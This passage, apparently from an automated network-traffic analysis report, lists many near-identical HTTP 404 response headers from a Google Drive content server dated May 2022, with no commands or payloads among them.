ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-cQCKWV8K8rMpLavucSvKiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0V4J5p7U/9nySrQCNzTqgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-VkMsJOUnp0EitrUZ/0H+xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-1G+4Nc4uJEIrSYG+hfBrMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-9QYfSpCtgZ1GxeVxHqC8Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-K6/eijS74zlN/AoFOkuvTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zzawp3vBzjAcEdUPcUp/Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LVJ98ojbNQ28cpc1kIMizQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-ca5TO9TmeDWbycrhvgYM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-GV/7aGXJN6vSig+/Q0SbdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BLrbW03Ipu97saVChlvegQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-D0Ah0uL3vbpuOJSad0zKFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:02 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-yip1KkNZoyqiaaOMyD3esw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5ed/Mxv+70kjkgXfnIMNrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lm3GsbNDxriOSHyzgPj0ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rG6UUZ+dEedvlnYdQJOTGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-+jYqIAcrVcZrxQEpWE9A4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-2kXwWrkDgfDd9pqHCSSuDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-wp7IWKVuC4kI87h1X00h+g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
